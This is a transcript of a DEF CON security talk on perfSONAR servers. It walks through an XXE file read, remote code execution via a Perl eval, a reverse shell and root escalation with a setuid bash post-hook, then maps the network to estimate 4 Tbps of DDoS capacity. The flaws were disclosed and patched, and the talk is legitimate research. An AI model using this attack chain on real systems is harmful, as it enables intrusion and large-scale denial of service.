 Welcome. Thank you all for skipping lunch if you're here. Welcome to my talk on attacking network infrastructure. My name's Luke. Here's some point info about me. I'm a security engineer originally from Minnesota. I'm working in the Bay Area currently. I'm a junior undergraduate student. It's my second year at DEF CON. I spoke last year. I also participate in a lot of bug bounties. So if any of you companies run a bug bounty, you've probably heard my name. It's a jerk that smits bugs at anything other than working hours. If you have any questions about this presentation or you'd like to send me legal threats, there's my contact information. I'll put it back up at the end along with the code and the slides for this presentation will be linked at the end. Louder. Okay. Better. I'm trying to avoid tipping it over. Alright, let's get the boring stuff out of the way first. Here's my lovely disclaimer. The views and opinions expressed in this presentation are the author and don't necessarily reflect the official policy or position of any current or previous or future employer. Just don't sue me. Alright. As usual, we'll start with a quick rundown of what we're going to be talking about today. I'm going to start with what Internet 2 is, then move into some of their products, mapping their network, and then exploiting some of those products in order to gain control of devices that are running on very large network uplinks. Now, to make this presentation work, there are two computers and four VMs up here that all have to work together perfectly, and there's only so many sacrifices you can make to the demo gods, so please bear with me if things don't work well. I've tested them enough, but yeah, without further ado, let's get started. So I wanted to give a bit of backstory about how I got started looking at this software and this perf sonar product, which we'll get into in a minute. The university I attend has a nice website full of information about what applications and services are available to me as a student. When I board, I like to browse around and see, excuse me, what I'm able to access. It's kind of amazing what an EDU email address grants you these days. One of these pages was called Internet 2. So the description is, the Internet is a global system of interconnected networks. The university connects to both the global Internet and a number of special research and education networks commonly referred to as Internet 2. These research provide high bandwidth connectivity, enabling and supporting research collaborations, educational opportunities, regionally, nationally, and around the world. Basically, it's a private fiber network run between universities. It's used for sharing all sorts of research data that would take a very long time to transfer over the standard Internet. If you go to their website, you find an even more boring description about how Internet 2 is a community of research and leaders and academia. Basically, it's just a consortium of universities. There are some corporations and some government agencies but it's mainly universities connected to this and it's mainly used for sharing research. But one of the other things they do is they create software for all of the people in this consortium. So they share the software between all of the companies and universities that participate and in doing so they also share vulnerabilities between each other since they're all running the same software. They also do collective bargaining on everything from AWS to Splunk to VMware. Basically, it's there to benefit all of the companies that participate. The other thing that it is, is a private network. So this is what I was talking about. This is a map of their actual dark fiber. The total is about 8.8 terabits a second of optical capacity and about 100 gigabits a second of Ethernet capacity. Again, it was mainly developed for sharing research and technologies between universities. I get really excited when I see something like this it's not just a whole bunch of blinking lights but these are additional routing paths between each of the nodes on this network. Internet 2 has been around since 1997 and a lot of people didn't really care about security back then and so there's a whole lot of risk here where these routing paths might be trusted or might be not even considered by some security teams because they've been around for so long. In addition to the actual network, like I said they produce a variety of products. Actually, most of these products are open source which is really nice. The most popular one they have is called Shibboleth. It's a federated identity management system. Essentially it's a really nice SAML provider. It's really extensible. If you've ever done any penetration testing on pretty much anything running at a US based university it likely interacted with Shibboleth for authentication. But Shibboleth is their most popular product. It's been poked at by some other people before so I wanted to look at some of their other stuff. They have a lot of tools in the performance and analytics category so because they run these fiber networks they need to maintain the health of these networks and so they do that through a tool called Bandwidth Control which is essentially a wrapper around Iperf. It does a lot of the hard work in setting up a receiver and a sender on either end. NDT is a diagnostics tool. OWAMP is one way ping and Perf Sonar is a wrapper around all of those tools and it's essentially an ISO you download and you can install it on one of your servers and it makes scheduling bandwidth control tests and OWAMP tests really easy. We'll look at what it actually looks like in a minute. First off I just explained what Perf Sonar is for you to give a closer example if we are here in Las Vegas if you look at the Las Vegas node here in Las Vegas wanted to make sure that their fiber connection to Salt Lake City is remaining solid they would set up a Perf Sonar instance in Las Vegas and a Perf Sonar instance at Salt Lake City and because they're all part of the same network they collaborate and basically you'll set up tests to run say every 24 hours and they'll alert you if the network goes down or if performance starts degrading. Alright so I'm going to actually look at how we have two instances set up here, two Perf Sonar instances they're called Impact and Torpedo for easier things here so you see they're on the same network and so I'm going to run a quick bandwidth control test here so this is just showing how some of their tooling works and so what it's done here is it's chosen to use Iperf you can customize this you can say I want to use Thule or I want to use Iperf 2 or 3 because the way Iperf works you need both ends to agree on when to set up a receiver and what ports to use and then once that time goes we have our info here so we can see we've got about a gigabit a second which makes sense since both of these hosts are running on gigabit connections alright now let's look at the actual toolkit website so this is the loads on our interface so this is what their web interface looks like so it's essentially just a GUI for that tool I just used so you can see here I've set up a tester on every half an hour between Impact and Torpedo and we can see there's the last time the throughput was 600 megabits a second I can pull up and look at a graph of how that's changed over time now since this is a virtual machine there's big gaps here but you know it's easy for a network to look at this and kind of see what's happening on their network alright back to the actual presentation so one of the things I like to do when I'm first approaching a product is when I'm looking for issues is look at what mistakes have already been made in the past so developers tend to make the same mistakes over and over again it's just how it is right now in the industry and so I went through a persona I used to be hosted on Google code and when I look up it was down because the whole Google code being deprecated so issue 783 was found and basically it's a vulnerability in the web interface that I just showed you it was patched in 2013 and this is the patch for the issue so if you look at this it's pulling in Perl's LibXML library and it's adding an external entity handler that just always returns an empty string so we're going to look at what an external entity is and then how to exploit them in the real world so if we start with a simple XML file hopefully everyone can see this we have a list of all the presentations I've given so we have the name, the location and then the author and the author is always going to be the same every time it's always going to be Luke Young XML has this feature where you can define an entity and why with the value Luke Young and then I can just reference this entity with an ampersand the name of the entity and a semicolon that way if I ever changed my name if I got married I can just edit it here and it will update throughout the rest of the XML document and most XML parsers support this by default so when you go to get the value within Python or whatever you're using it will just return Luke Young the most or one of the most popular attacks with this was something called the Billion Laws Attack so basically it's a denial of service issue so you start with a single entity you define an entity that includes that one 10 times define another one that includes that entity 10 times and you get an exponential growth here in memory when a XML parser tries to un-serialize this XML and for the most part this actually here expands to something like 16 gigabytes of memory and will actually crash most applications that have XML entities enabled but denial of service phones in this context are kind of lame just crashing this software is boring it's not something we're looking for so the more interesting feature of XML is something called external entities so you can define a system entity with a file URL and what this will do is it will actually load the contents of that file and inject it into the XML so in this case I'm going to load in etsy password and fill it in right here this was originally intended for people that have multiple XML files and they can actually include other XML files within that that way you just load in one and it magically pulls in all the rest of the files but you can have a nice folder structure where you don't have to have everything in a giant XML file however there's obviously a lot of potential for abuse here because you could actually include a file from the system so back to the actual issue the patch for this issue was to make whenever loading an external entity it will return an empty string that will not prevent the denial of service issue we just referenced but anytime we try to do something like load a file URL that will fail so the first thing I'm just going to do I'm going to take, I've actually r-synced the file system off one of these devices and I'm going to just search for libxml new without an external entity handler defined so we're looking to see if they missed anything or if someone added new endpoints where they forgot to add this patch and if we run it right here we've immediately got off the bat 13 matches of potential ways to get into this application using external entities now this is actually a bit of a false positive because some of these are libraries that are all sim linked and so Sublime thinks they're different files but there's actually only about six different ones here the particular one that's vulnerable is in nmwgmessage so as you can see here it defines a libxml handler it doesn't set up a way to block external entities and then it parses in a file and if we trace this all the way back out the stack this is accessible as an external user so that request looks a little bit like this so we're going to send a SOAP request any of you have done stuff with xml you probably know what SOAP is and then we'll define this nmwg message handler and then within here we're going to include etsy password so this file right here we're actually going to try and do this live now so we're going to send a post request to the OPPD daemon on the server which traces all the way back to that Perl file and if we run it there's etsy password on one of the systems so next thing I want to do the authentication into application is handled by etsy shadow so I'm just going to read etsy shadow instead this is a file I didn't show it's just the exact same thing except for etsy shadow and it doesn't work so the reason this happens here it actually sends us an extremely verbose error message that it can't read that file so the reason that's happening is because the OPPD daemon isn't running as root on this device so we don't have permission to read this file and we can read other stuff off the system for example we can read a sql somewhere in here sql passwords off the system configuration files however none of it was really exploitable actually so while we can read arbitrary files because authentication is handled by etsy shadow we couldn't get admin users we couldn't get anything interesting the sql database is blocked off so it's only accessible by local host and so I hit a like complete data end here so if we go back to the presentation that here was I was able to find cross-site scripting kind of everywhere but cross-site scripting bombs are kind of lame you have to get an admin to click a link while they're logged in and no one logs into these devices that often and it seemed there was a lot of xxc as you saw there were other issues there however getting rce just seemed like an impossible task I actually put it down for like a month and finally came back to it later and I found something called bandwidthgraph.cgi a second ago that was bandwidthgraph.cgi so this endpoint handles graphing historical bandwidth data of tests and if we actually look at the data and the source code for this we can see something interesting so there's a eval call on an attribute from the xml data that is sent in here and if we trace this all the way back up we're going to get into exploiting it now let's take a look at some example performance data you can see it's basically iperf results with a timestamp and the throughput value and if you look at the throughput value it's a scientific notation number and parsing scientific notation in Perl is like five lines and parsing it with eval is one and so a developer was being lazy and they decided to use eval thinking that it was perfectly safe so we can see why I made this mistake though you're in a rush and what happens so let's actually look at how to reach this code path because it's quite complicated so starting at the top of bandwidthgraph.cgi we need a couple parameters we need a url parameter which is the measurement archive this measurement archive contains all of the data of tests that have been running over time so we need a url to access that front because you can run this in a cluster environment to look it up by so if a test has a name it has a key so assuming we have both of those we get all the way down into this get data function which goes and looks it sets up a data request makes a request to the measurement archive and then pulls out this datum XML attribute long story short gets all the way down to throughput there's actually a second step in here too though so the way the measurement archive works is when it makes a request it first sends an echo request and we have to echo that back with a success message before it will request the data and so the reason that handshake is there is to avoid actually kind of an attack scenario here where you're pointing it at an attacker-controlled system however since we have complete access to the source code and this is open source we're able to actually generate that correct echo request back so this is what a like this gets sent in and the important part here is the event type here as long as this value has that string it will be accepted by the server and then following that we will so this is we'll send back our actual exploit string so if we look in the throughput parameter here we put back tick who am I back tick because it's executing purl in purl you can put back ticks and it will drop to a shell but here's our example exploit now I actually have a script to do that and all of these scripts will be available actually are available right now if you have the link alright so we have a simple server here it's going to handle all of the magic of sending an echo request and then sending the exploit string and if we actually pull up bandwidthgraph.cgi you can see we provided the key parameter in this case doesn't matter what it is because we control the server we can access our server app and we don't see anything interesting here on the page but if we actually look at the source code we can see right here in the source code it's printed out the results of who am I so taking that a step further we can put a full this is a just a python pty callback so we can actually get an actual shell on this device instead of having to run commands one at a time we refresh the page we have a full shell now alright so you can see we're running as a patchy so same thing here we want a cat that's the shadow and it doesn't work again so we're kind of stuck having regular RC fun but we want root RC so that's the presentation we're going to talk about now how we obtain root on this device so if we actually pull up the purpose on our toolkit interface it has the ability to change configuration settings you can turn on and off services such as bandwidth control and then you can change configurations for those you can change the default port or you can change what restrictions there are for example you can change your bandwidth control to only accept TCP or only accept UDP performance tests and in order to start and stop services on Linux you need root unless you've made special changes so somehow the application is obtaining root in order to do this but if we go back to our shell we don't have pseudo privileges and there's no really easy way to find root there off of any file permissions or anything else so if we actually look at in the source code again all the way down they have a daemon running as root called toolkit config and it's a simple XMLRPC server it's only running on loopback and it exposes five methods it exposes a config firewall method no parameters so not anything exploitable there it exposes a write file start stop and restart service so write file looks really interesting ideally we'd just write a new file a new cron job as root and now we have escalation and so here's the example code to do that we say load in the config client set it up to point to the loopback interface and then call the save file method which is an alias of write file I don't know why they change the method name in different parts of the application and if we try to actually run this it doesn't work we have another issue here too and so if we look at the source code there's actually a white list of what files you're allowed to edit so they put a little thought into this and decided we shouldn't let someone write arbitrary files as root that's a bad idea so they built this white list here are all of the files in the white list it's a rather extensive list because this is an extremely customizable application you can install other packages and so basically any config file that ever want to be edited as part of this application is in this list and there's a couple of interesting ones in here there's Etsy hosts so we have the ability to redirect network traffic there's Etsy NTP so if we have any issues we can change the time on the host along with a bunch of perf sonar software so bandwidth control, oWAMP, NDT and we can edit all of those we can also write HTML files since we're Apache so we could drop a cross-site scripting payload but again not very interesting we want root on this device so if we look at the bandwidth control configuration this is an excerpt from it it's got a user and a group so it drops privileges immediately after running and then a post hook parameter at the bottom and so what this is, it's similar to a get hook what happens is after a successful bandwidth control test it executes the post hook and so since we can edit this config manager we can change the user and group so that the application never drops privileges it's running as root and then we point it to a post hook controlled by our Apache user that way when we trigger a successful test it's going to trigger our post hook parameter as root so in order to actually do that it's a little more complicated we don't want to let the network administrator notice that something's broken so we have to do this as quickly as possible and then restore it back to its original configuration as quickly as possible so we're going to back up the original config stop bandwidth control write our post hook write the new bandwidth control config start bandwidth control trigger a session which has to be successful which will trigger our post hook stop bandwidth control remove our post hook so we delete our evidence and restore the original bandwidth control config and then start it back up again so I'm going to actually try to do that now so we have our shell we're currently logged in as Apache I'm going to pull down shell.pm which is a script I've written and we're going to run it so that's actually going to take about 60 seconds to run so we're going to look at what this is doing here it's pulling in again the config client we're loading in I don't know why this has to be here I don't write curl scripts but it crashes if it's not and here is the post hook we're actually writing so we're going to copy bin bash to a different value and then we're going to set UID on that binary so that whenever we run it we can become root and then the rest of this is doing all of that work restoring the original config here's our exploit config with the post hook parameter inside of it so if we actually go back to the shell hopefully this is why you don't do live demos let's try that again oh we are root okay it did work awesome now that's fun we have root on these devices who cares does anyone actually even running these things you know I happen to stumble across this it's an obscure application are these running anywhere in the wild was my next step so next goal is to try to find out where these are running I don't have an ISP that plays nice with mass scanning the entire IPv4 internet space so I had to find a nicer way to locate these devices so if you actually look at an example here's a live instance of one of these running there's all sorts of information here this is unauthenticated you can view all of this you don't need any creds you can see what services are running what ports they're running on and more importantly you can see the interfaces on the right there so you can see information about if they're connected, if they're dual homed and they are connected to an internal private network you can see the MAC address of the devices and you can actually see the speed of the card according to ETHTool so we can tell if there is a 10 gigabit device without even authenticating the other thing we have here at the bottom is test results so you can actually see what application or what other hosts each of these instances is testing against so the idea is we start with one of these nodes we ask it who they're testing against and then we ask each of those nodes who they're testing against and we map the entire network that way but we still need some starting nodes and so if only there was a public database of all of these devices oh wait if you look in the corner up here there's globally registered which is pretty much exactly what you think it is they provide a actual database on their site of all of the globally registered perf sonar servers also unauthenticated it even has a pretty web interface so here's the idea we start with the public list because there are still unlisted instances and we map the network from there on so you can see the greyed out ones represent ones that aren't publicly registered but we can locate them through the other ones alright so doing that I actually wrote a it's about a 300 line goliang script that does this exactly what I've just described it starts, it pulls down the list of all the publicly registered instances maps them all who they're testing with maps all of them and it pulls down the interface data from each of those it takes about 4 minutes to map the entire network from my gigabit connection that could probably be improved it's not actually saturating that my code kind of sucks but it's open source someone else can fix it so what I actually do is kind of take all of this data and load it into Splunk using all of that as of April 29th when I mapped the network there were 970 publicly routable nodes combined to 12.51 terabytes of RAM across all of them and 29.85 Terahertz of CPU cycles across all of these devices it's easier to understand terms the average node has 13 gigabytes of RAM and 12 cores at 2.6 gigahertz alright so next we want to look at what the theoretical network speed of this device is so each of the included in that data is the information about the network card on the box so I can tell if it's a 10 gig or a 20 gig or a 40 gig network card so if we do all of that and sum all of those together we get the theoretical bandwidth of the perf sonar network which is 5.719 terabits a second now and I really wanted to know what this was actually capable of because you may have a 10 gig card and only a 5 gig uplink and I can't find any way to tell that without exploiting your server which I like not going to jail however I had an idea here so I have a gigabit connection at home I can run bandwidth tests from my server to one of the perf sonar instances and find out information about their bandwidth but that has an upper bound I can only find out up to a gigabit a second since I only have a gigabit uplink I'm not about to go pay for a 40 gig uplink in order to test these vulnerabilities so I had to find some other way turns out they have another friendly unauthenticated API where you can say run a bandwidth test against a different perf sonar node and send me the results so the goal here is actually enumerate all their perf sonar instances and their maximum interface speed calculate their location based on GOIP and then find the 5 closest instances that have the same or faster network cards within them and then after all of that is done we want to run tests between them and this sounds like some horrible messed up CS interview question I can guarantee you I did not implement this very efficiently there is the splunk query that does all of that it works it takes like an hour to run but it does return results so once we have all of that data we actually want to run these tests and we have to be careful here when we are running these tests because we actually have the risk here of generating a denial of service when running these tests so we have to be careful when running these tests at the same time ever we never want to run more than 10 at the same time ever and we never want to run two tests on the same instance so if you have a 10 gig uplink but I run two 10 gig tests against you they are both going to get like 5 gigs which is inaccurate I want to only run one at a time and then some hosts don't have bandwidth control enabled so while I know they are exploitable I can't find out what their bandwidth is about hosts that if we were exploiting this real we would have been able to attack but we can't because they don't have bandwidth control enabled so doing all of that which takes a very long time to run I was able to calculate the actual demonstrated total bandwidth of the perf sonar network which is 3.7 terabits a second now in the title of the talk I mentioned 4 terabits I didn't just round I did account for all of those instances that don't have bandwidth control enabled but we know that they are sitting on at least a 100 megabit uplink and that combine that all together you get to 4 terabits a second now the fact that I'm calling it um so they're excuse me so if you've any of you around last two years ago now Cloudflare blocked an attack in Europe against spam house it was a 300 gigabit a second attack um and they had an interesting effect they were seeing where some of their network could handle the traffic their upstream ISP peers were actually falling over and that's one of the risks here when you have that much bandwidth and that was 300 gigabits a second given that was two years ago this is 4 terabits a second and we have complete control of the packets being sent because we are rude on this device this isn't something like DNS amplification where if you have the right firewall rule you can block that traffic I could send you 4 terabits a second of legitimate HTTP requests assuming the network cards can push that out it's really hard to filter something like that because it could be legitimate traffic um given there are actually some interesting ways of doing stuff like this alright so onto the live demo hopefully we are going to take down a site here not someone else's site again so the initial version of this talk I have a couple of perf sonar instances running at home and I was planning on attacking a server co-located in the data center and I launched the attack and my phone blew up because I crashed the network at the house and there were about 18 dudes pissed off at me that their internet didn't work and about 10 minutes later I got a letter from the ISP saying please stop doing that so we are going to cheat a little and we are going to attack some VMs here so we have a simple server, HTTP server running on poncho here I'm going to download a simple DDoS script and hopefully it's really hard to see but that is just sitting there spinning right now so onto the last part so I reported all of these issues to perf sonar sorry to disappoint you you can't actually go exploit these right now though I would highly encourage people to continue looking at this software legacy pearl application I don't think I found everything by any means I kind of stopped once I had a full chain all the way to root and it is interesting and they are very responsive so this was one of the pull requests since it's all open source I just fixed the issues myself and the team was extremely friendly they fixed the issues, merged my request within 24 hours and pushed out a new build pretty much immediately and the great part is all of these instances have auto updates enabled so pretty much everyone on the network is upgraded at this point that was about a month ago that build got pushed out so when you do find security issues they typically are patched very quickly by them so that's great was very happy with the response time by them and then finishing this up all of the exploit code has been released on my github along with the slides board.engineer has my has links to it right there if you don't want to remember that as promised here's my contact info again we got out a little early this time so you have some time to make it to your next talk if people have questions feel free to that was a really good question he asked what I spent $5 on I put it in the talk title I could repeat the question the question was what did you spend $5 on good question it's in the talk title again in the initial version of this application I was going to spawn up a VPS instance for $5 and then launch and attack live across the internet and then of course my ISP got very angry about that so I did not update the title unfortunately that's what the $5 was from total time spent actually finding the exploits was probably like 10 hours and then writing reliable exploits for them was probably like 6 and then mapping the network was a colossal pain since I'm not a stats person and figuring out how to write those queries correctly sucks that was probably another like 10 40 hours roughly total thank you all have a great DEF CON see you back thanks